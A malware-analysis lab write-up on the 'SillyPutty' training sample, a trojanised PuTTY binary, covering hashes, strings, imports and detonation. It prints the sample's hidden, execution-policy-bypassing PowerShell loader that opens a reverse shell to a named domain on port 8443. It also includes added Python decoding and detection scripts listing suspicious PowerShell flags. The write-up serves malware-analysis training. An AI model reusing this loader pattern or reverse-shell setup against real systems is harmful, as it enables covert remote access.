Lab: SillyPutty Challenge

My first challenge as part of the PMAT course: I have been given a binary and asked to analyse it, employing the basic static and dynamic analysis methodologies I've learnt.

Basic Static Analysis

I unpack the binary and open it in PEstudio, as that tool calculates the relevant hashes while also giving me information about the binary itself.

This showed me the calculated SHA256 hash alongside the architecture of the binary.

    Q: What is the SHA256 hash of the sample?

    A: 0C82E654C09C8FD9FDF4899718EFA37670974C9EEC5A8FC18A167F93CEA6EE83

---

    Q: What architecture is this binary?

    A: 32 bit (x86) Windows Executable

---

Moving onto the next question I put the hash into Virus Total to see if there was anything flagged from it.

So the binary is a recognised trojan.

    Q: Are there any results from submitting the SHA256 hash to VirusTotal?

Yes, the binary is a widely recognised trojan, and the references to a shellcode family hint that it has shellcode execution capabilities.

---

    Q: Describe the results of pulling the strings from this binary. Record and describe any strings that are potentially interesting. Can any interesting information be extracted from the strings?

I then sifted through the strings pulled from the binary by PEstudio, sorting them by size, and found a PowerShell command that runs with the hidden-window option. I also analysed the binary with FLOSS, but no extra information could be gleaned that way.

The full command is as follows:

`powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"`

This contained a base64 string, which I decoded in CyberChef and then had to further decompress with gunzip, giving the following script:

So going through this script I found a few interesting instances.

Depending on the options, this script could create either a bind shell (TCP 8443) or a reverse shell (bonus2[.]corporatebonusapplication[.]local, 8443).
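The base64-then-gunzip chain above can be undone without CyberChef. The following Python script is an added example, not part of the original writeup: it pulls the base64 argument out of a PowerShell loader command line shaped like the one above and reverses the chain (base64 decode, then gzip decompress). The sample's real blob is not reproduced here, so `build_cmdline` and `PLACEHOLDER_SCRIPT` are constructed stand-ins used only to exercise the decoder.

```python
import base64
import gzip
import re

# Matches the FromBase64String('...') argument inside the recovered one-liner.
_B64_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")


def extract_b64(cmdline: str) -> str:
    """Pull the base64 blob out of the powershell.exe command line."""
    match = _B64_RE.search(cmdline)
    if match is None:
        raise ValueError("no FromBase64String('...') argument found")
    return match.group(1)


def decode_stage(cmdline: str) -> str:
    """Reverse the loader chain: base64 decode, then GzipStream decompress."""
    raw = base64.b64decode(extract_b64(cmdline), validate=True)
    return gzip.decompress(raw).decode("utf-8")


def build_cmdline(script: str) -> str:
    """Constructed helper: wrap a script the same way the sample's loader does."""
    blob = base64.b64encode(gzip.compress(script.encode("utf-8"))).decode("ascii")
    return (
        "powershell.exe -nop -w hidden -noni -ep bypass "
        '"&([scriptblock]::create((New-Object System.IO.StreamReader('
        "(New-Object System.IO.Compression.GzipStream("
        "(New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String("
        f"'{blob}'))),[System.IO.Compression.CompressionMode]::Decompress)"
        ').ReadToEnd()))"'
    )


# Constructed placeholder script (not the sample's real payload); it only carries
# the two indicators the writeup identified, so the decoder can be checked end to end.
PLACEHOLDER_SCRIPT = (
    "$target = 'bonus2.corporatebonusapplication.local'\n"
    "$port = 8443\n"
)

if __name__ == "__main__":
    print(decode_stage(build_cmdline(PLACEHOLDER_SCRIPT)))
```

To use it on a real sample, pass the full `powershell.exe` command line string recovered from the strings output to `decode_stage`.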

---

    Q: Describe the results of inspecting the IAT for this binary. Are there any imports worth noting?

I cross referenced with malapi.io to track down the malicious imports in the IAT and came up with a handful of them.

The imports range from file-discovery functions (using the registry and the Win32 API), commonly seen in shellcode-executing malware, to anti-debugging via `IsDebuggerPresent`, shell execution via `ShellExecuteA`, and process-creation imports.

---

    Q: Is it likely that this binary is packed?

Not really. I checked the values in PEstudio, and the size of initialised data added to the size of code equals the size of image.

--- * ---

Basic Dynamic Analysis

    Q: Describe initial detonation. Are there any notable occurrences at first detonation? Without internet simulation? With internet simulation?

The first detonation was carried out without any internet connection; the notable occurrence was a PowerShell window opening for a brief moment before disappearing.

I had Procmon filtering for processes by the name of the executable while this was happening, which gave me a bit of insight into what the executable did.

This section shows the binary querying the security information of its own file, `ntdll.dll` and `kernel32.dll`, and causing a buffer overflow, likely with the aim of granting itself privileges and access to the respective files.

Viewing the process tree in Procmon also confirmed my initial assumptions: it showed `powershell.exe` as a child process of `putty.exe`, spawned with the command I found during static analysis.

The child process `conhost.exe` was also spawned by PowerShell, with the command line visible in the process tree.
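The process tree above (`putty.exe` spawning `powershell.exe` with `-w hidden -ep bypass` and a base64 stage, which in turn spawns `conhost.exe`) is exactly what a host-based detection would key on. The following Python is an added example, not part of the original writeup: it runs a simple detection over constructed process-creation events modelled on that tree, flagging PowerShell launches that carry the loader's flags and stager markers and reporting their parent and children.

```python
from typing import Iterable

# Constructed process-creation events, modelled on the tree seen in Procmon:
# putty.exe -> powershell.exe (-w hidden, -ep bypass, base64 stage) -> conhost.exe,
# plus an unrelated PowerShell run for contrast. PIDs and paths are made up.
EVENTS = [
    {"pid": 4120, "ppid": 3980, "image": "putty.exe",
     "cmdline": r"C:\Users\lab\Desktop\putty.exe"},
    {"pid": 4188, "ppid": 4120, "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -noni -ep bypass "
                "\"&([scriptblock]::create(...FromBase64String('AAAA')...GzipStream...\""},
    {"pid": 4200, "ppid": 4188, "image": "conhost.exe",
     "cmdline": r"\??\C:\Windows\system32\conhost.exe 0x4"},
    {"pid": 4300, "ppid": 1000, "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]

# Flags and stager markers taken from the command line recovered in static analysis.
SUSPICIOUS_FLAGS = ("-nop", "-w hidden", "-noni", "-ep bypass")
STAGER_MARKERS = ("FromBase64String", "GzipStream", "scriptblock]::create")


def powershell_traits(cmdline: str) -> list:
    """Return the suspicious flags and stager markers present in a command line."""
    lowered = cmdline.lower()
    return [t for t in SUSPICIOUS_FLAGS + STAGER_MARKERS if t.lower() in lowered]


def find_stager_chains(events: Iterable[dict], min_traits: int = 3) -> list:
    """Flag powershell.exe launches with enough stager traits, plus parent and children."""
    events = list(events)
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if e["image"].lower() != "powershell.exe":
            continue
        traits = powershell_traits(e["cmdline"])
        if len(traits) < min_traits:
            continue
        parent = by_pid.get(e["ppid"], {}).get("image", "<unknown>")
        children = sorted(c["image"] for c in events if c["ppid"] == e["pid"])
        findings.append({"pid": e["pid"], "parent": parent,
                         "children": children, "traits": traits})
    return findings


if __name__ == "__main__":
    for finding in find_stager_chains(EVENTS):
        print(finding)
```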

On detonating with a network connection, I set up monitoring with Procmon and TCPView on the host end while Wireshark was watching at the remote end (REMnux).

I caught a short-lived connection made by PowerShell in TCPView but wasn't able to get any information from it, so I moved to REMnux, where Wireshark did have some interesting bits for me.

So the malware queried DNS for the remote address we found in the PowerShell script, and then tried to send data to TCP port 8443, which rejected all its connection requests as I had not set up a listener prior to detonation.

But this did provide conclusive evidence that this was a reverse shell malware.

---

    Q: From the host-based indicators perspective, what is the main payload that is initiated at detonation? What tool can you use to identify this?

From the host-based indicators perspective, the main payload initiated at detonation is the sneaky PowerShell script which attempts to spawn a reverse shell.

This can be identified with the Sysinternals tool `procmon`.

---

    Q: What is the DNS record that is queried at detonation?

    A: bonus2[.]corporatebonusapplication[.]local

---

    Q: What is the callback port number at detonation?

    A: 8443

---

    Q: What is the callback protocol at detonation?

    A: TLS

---

    Q: How can you use host-based telemetry to identify the DNS record, port, and protocol?

    A: I can use the Wireshark application installed on the FLARE VM as host-based telemetry, filtering for requests going to destination port 53, i.e., DNS requests, to identify the DNS record, port and protocol.

---

    Q: Attempt to get the binary to initiate a shell on the localhost. Does a shell spawn? What is needed for a shell to spawn?

So this was tricky: initial tries of listening with ncat always resulted in the connection closing abruptly. Then I went back to the script, and apparently the option for SSL verification was set to true, which is why the shell wasn't being created, as it needed an SSL connection.

So I set up one using ncat, and that gave me access to the shell.
